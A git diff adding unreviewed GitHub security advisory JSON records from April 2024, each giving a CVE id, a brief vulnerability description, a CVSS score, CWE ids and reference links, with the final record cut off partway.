b/advisories/unreviewed/2024/04/GHSA-c2p9-p97g-7246/GHSA-c2p9-p97g-7246.json new file mode 100644 index 00000000000..f6ec3caa7a6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c2p9-p97g-7246/GHSA-c2p9-p97g-7246.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2p9-p97g-7246", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26240" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26240" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c344-5fxf-w34m/GHSA-c344-5fxf-w34m.json b/advisories/unreviewed/2024/04/GHSA-c344-5fxf-w34m/GHSA-c344-5fxf-w34m.json new file mode 100644 index 00000000000..37d4bb32ff2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c344-5fxf-w34m/GHSA-c344-5fxf-w34m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c344-5fxf-w34m", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28911" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28911" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28911" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c37g-ppfr-pj55/GHSA-c37g-ppfr-pj55.json b/advisories/unreviewed/2024/04/GHSA-c37g-ppfr-pj55/GHSA-c37g-ppfr-pj55.json new file mode 100644 index 00000000000..fe4e18c3b5f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c37g-ppfr-pj55/GHSA-c37g-ppfr-pj55.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c37g-ppfr-pj55", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28938" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28938" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28938" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c3hc-353g-xvq9/GHSA-c3hc-353g-xvq9.json b/advisories/unreviewed/2024/04/GHSA-c3hc-353g-xvq9/GHSA-c3hc-353g-xvq9.json new file mode 100644 index 00000000000..7788dd7001f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c3hc-353g-xvq9/GHSA-c3hc-353g-xvq9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3hc-353g-xvq9", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3064" + ], + "details": "The Elementor Addons, Widgets and Enhancements – Stax plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Heading' widgets in all versions up to, and including, 1.4.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3064" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/stax-addons-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16320b5e-1cb5-4e6d-ad2e-8ccd9cfa45ef?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c3j2-cg9f-6vvm/GHSA-c3j2-cg9f-6vvm.json b/advisories/unreviewed/2024/04/GHSA-c3j2-cg9f-6vvm/GHSA-c3j2-cg9f-6vvm.json new file mode 100644 index 00000000000..2b1019cc69d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c3j2-cg9f-6vvm/GHSA-c3j2-cg9f-6vvm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3j2-cg9f-6vvm", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2456" + ], + "details": "The Ecwid Ecommerce Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 6.12.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2456" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055878%40ecwid-shopping-cart&new=3055878%40ecwid-shopping-cart&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e10127aa-a5a5-4394-8b54-b57ba1369d77?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c4qh-w68f-gq2f/GHSA-c4qh-w68f-gq2f.json b/advisories/unreviewed/2024/04/GHSA-c4qh-w68f-gq2f/GHSA-c4qh-w68f-gq2f.json new file mode 100644 index 00000000000..d214b711300 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c4qh-w68f-gq2f/GHSA-c4qh-w68f-gq2f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c4qh-w68f-gq2f", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2022-43216" + ], + "details": "AbrhilSoft Employee's Portal before v5.6.2 was discovered to contain a SQL injection vulnerability in the login page.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43216" + }, + { + "type": "WEB", + "url": "https://abrhil.com" + }, + { + "type": "WEB", + "url": "https://github.com/blackarrowsec/advisories/tree/master/2022/CVE-2022-43216" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c52r-8hmj-x4qg/GHSA-c52r-8hmj-x4qg.json b/advisories/unreviewed/2024/04/GHSA-c52r-8hmj-x4qg/GHSA-c52r-8hmj-x4qg.json index 028ed776ea3..ede26411cda 100644 --- a/advisories/unreviewed/2024/04/GHSA-c52r-8hmj-x4qg/GHSA-c52r-8hmj-x4qg.json +++ b/advisories/unreviewed/2024/04/GHSA-c52r-8hmj-x4qg/GHSA-c52r-8hmj-x4qg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c52r-8hmj-x4qg", - "modified": "2024-04-03T00:30:55Z", + "modified": "2024-04-06T18:31:17Z", "published": "2024-04-03T00:30:55Z", "aliases": [ "CVE-2024-3204" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://drive.google.com/drive/folders/1T1k3UeS09m65LjVXExUuZfedNQPWQWCo?usp=sharing" }, + { + "type": "WEB", + "url": "https://github.com/Blosc/c-blosc2/releases/tag/v2.14.3" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.259051" diff --git a/advisories/unreviewed/2024/04/GHSA-c5fj-m6rf-9968/GHSA-c5fj-m6rf-9968.json b/advisories/unreviewed/2024/04/GHSA-c5fj-m6rf-9968/GHSA-c5fj-m6rf-9968.json new file mode 100644 index 00000000000..9a86a8ada95 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c5fj-m6rf-9968/GHSA-c5fj-m6rf-9968.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5fj-m6rf-9968", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26244" + ], + "details": "Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26244" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26244" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c62v-4j3q-wm9h/GHSA-c62v-4j3q-wm9h.json b/advisories/unreviewed/2024/04/GHSA-c62v-4j3q-wm9h/GHSA-c62v-4j3q-wm9h.json new file mode 100644 index 00000000000..831d8683ea0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c62v-4j3q-wm9h/GHSA-c62v-4j3q-wm9h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c62v-4j3q-wm9h", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31306" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Blocks for Gutenberg allows Stored XSS.This issue affects Essential Blocks for Gutenberg: from n/a through 4.5.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/essential-blocks/wordpress-essential-blocks-plugin-4-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c732-w2pw-3g36/GHSA-c732-w2pw-3g36.json b/advisories/unreviewed/2024/04/GHSA-c732-w2pw-3g36/GHSA-c732-w2pw-3g36.json new file mode 100644 index 00000000000..2b29a6ce4c5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c732-w2pw-3g36/GHSA-c732-w2pw-3g36.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c732-w2pw-3g36", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-26275" + ], + "details": "A vulnerability has been identified in Parasolid V35.1 (All versions < V35.1.254), Parasolid V36.0 (All versions < V36.0.207), Parasolid V36.1 (All versions < V36.1.147). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted X_T files. This could allow an attacker to execute code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26275" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-222019.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c76r-g8q5-m4cv/GHSA-c76r-g8q5-m4cv.json b/advisories/unreviewed/2024/04/GHSA-c76r-g8q5-m4cv/GHSA-c76r-g8q5-m4cv.json new file mode 100644 index 00000000000..cb2efb933ad --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c76r-g8q5-m4cv/GHSA-c76r-g8q5-m4cv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c76r-g8q5-m4cv", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28907" + ], + "details": "Microsoft Brokering File System Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28907" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28907" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c7ff-hjxw-jhqv/GHSA-c7ff-hjxw-jhqv.json b/advisories/unreviewed/2024/04/GHSA-c7ff-hjxw-jhqv/GHSA-c7ff-hjxw-jhqv.json new file mode 100644 index 00000000000..eb75d38f99e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c7ff-hjxw-jhqv/GHSA-c7ff-hjxw-jhqv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7ff-hjxw-jhqv", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31241" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThimPress LearnPress Export Import.This issue affects LearnPress Export Import: from n/a through 4.0.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31241" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/learnpress-import-export/wordpress-learnpress-export-import-plugin-4-0-3-admin-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c8c4-3mwr-7x6g/GHSA-c8c4-3mwr-7x6g.json b/advisories/unreviewed/2024/04/GHSA-c8c4-3mwr-7x6g/GHSA-c8c4-3mwr-7x6g.json new file mode 100644 index 00000000000..c45b325a3c6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c8c4-3mwr-7x6g/GHSA-c8c4-3mwr-7x6g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8c4-3mwr-7x6g", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26076" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26076" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c8c6-87mv-3fm9/GHSA-c8c6-87mv-3fm9.json b/advisories/unreviewed/2024/04/GHSA-c8c6-87mv-3fm9/GHSA-c8c6-87mv-3fm9.json new file mode 100644 index 00000000000..aa7f063d2cd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c8c6-87mv-3fm9/GHSA-c8c6-87mv-3fm9.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8c6-87mv-3fm9", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-28065" + ], + "details": "In Unify CP IP Phone firmware 1.10.4.3, files are not encrypted and contain sensitive information such as the root password hash.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28065" + }, + { + "type": "WEB", + "url": "https://syss.de" + }, + { + "type": "WEB", + "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-007.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c96c-x4rr-r9qq/GHSA-c96c-x4rr-r9qq.json b/advisories/unreviewed/2024/04/GHSA-c96c-x4rr-r9qq/GHSA-c96c-x4rr-r9qq.json new file mode 100644 index 00000000000..d32bc32f496 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c96c-x4rr-r9qq/GHSA-c96c-x4rr-r9qq.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c96c-x4rr-r9qq", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2786" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on the title_tag attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2786" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.4/widgets/card/widget.php#L1216" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.4/widgets/gradient-heading/widget.php#L260" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.4/widgets/gradient-heading/widget.php#L262" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.4/widgets/review/widget.php#L821" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3064385%40happy-elementor-addons%2Ftrunk&old=3044937%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=#file18" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4688c1ee-335c-4adb-bd68-894ff34d001d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c9p6-gwj4-77pf/GHSA-c9p6-gwj4-77pf.json b/advisories/unreviewed/2024/04/GHSA-c9p6-gwj4-77pf/GHSA-c9p6-gwj4-77pf.json new file mode 100644 index 00000000000..3fb9be27711 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c9p6-gwj4-77pf/GHSA-c9p6-gwj4-77pf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c9p6-gwj4-77pf", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-27908" + ], + "details": "A buffer overflow vulnerability was reported in the HTTPS service of some Lenovo Printers that could result in denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27908" + }, + { + "type": "WEB", + "url": "https://iknow.lenovo.com.cn/detail/420425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c9v6-58hr-jv8c/GHSA-c9v6-58hr-jv8c.json b/advisories/unreviewed/2024/04/GHSA-c9v6-58hr-jv8c/GHSA-c9v6-58hr-jv8c.json new file mode 100644 index 00000000000..8e5dc52eeb0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c9v6-58hr-jv8c/GHSA-c9v6-58hr-jv8c.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c9v6-58hr-jv8c", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-0837" + ], + "details": "The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0837" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3045497/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a54c2a89-4297-48f5-bbff-e5c20c26a632?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-ccq8-85cf-r5qh/GHSA-ccq8-85cf-r5qh.json b/advisories/unreviewed/2024/04/GHSA-ccq8-85cf-r5qh/GHSA-ccq8-85cf-r5qh.json new file mode 100644 index 00000000000..cac5d744cf3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-ccq8-85cf-r5qh/GHSA-ccq8-85cf-r5qh.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccq8-85cf-r5qh", + "modified": "2024-04-06T21:30:35Z", + "published": "2024-04-06T21:30:35Z", + "aliases": [ + "CVE-2024-3414" + ], + "details": "A vulnerability was found in SourceCodester Human Resource Information System 1.0 and classified as problematic. This issue affects some unknown processing of the file Superadmin_Dashboard/process/addcorporate_process.php. The manipulation of the argument corporate_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259583.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3414" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Human-Resource-Information-System/Human-Resource-Information-System-02.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259583" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259583" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311436" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T21:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cf2p-hqc9-vhmw/GHSA-cf2p-hqc9-vhmw.json b/advisories/unreviewed/2024/04/GHSA-cf2p-hqc9-vhmw/GHSA-cf2p-hqc9-vhmw.json new file mode 100644 index 00000000000..e8dc7112023 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cf2p-hqc9-vhmw/GHSA-cf2p-hqc9-vhmw.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf2p-hqc9-vhmw", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-23076" + ], + "details": "FreeChart v1.5.4 was discovered to contain a NullPointerException via the component /labels/BubbleXYItemLabelGenerator.java.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23076" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/115de1f7c3051403f0301cee0d293518" + }, + { + "type": "WEB", + "url": "https://github.com/jfree/jfreechart" + }, + { + "type": "WEB", + "url": "http://jfreechart.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T12:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cfhh-2gpx-32wx/GHSA-cfhh-2gpx-32wx.json b/advisories/unreviewed/2024/04/GHSA-cfhh-2gpx-32wx/GHSA-cfhh-2gpx-32wx.json new file mode 100644 index 00000000000..c0706b3a3d3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cfhh-2gpx-32wx/GHSA-cfhh-2gpx-32wx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfhh-2gpx-32wx", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-47541" + ], + "details": "An improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiSandbox version 4.4.0 through 4.4.2 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.5 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.7 and 2.5.0 through 2.5.2 and 2.4.0 through 2.4.1 and 2.3.0 through 2.3.3 and 2.2.0 through 2.2.2 and 2.1.0 through 2.1.3 and 2.0.0 through 2.0.3 allows attacker to execute unauthorized code or commands via CLI.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": 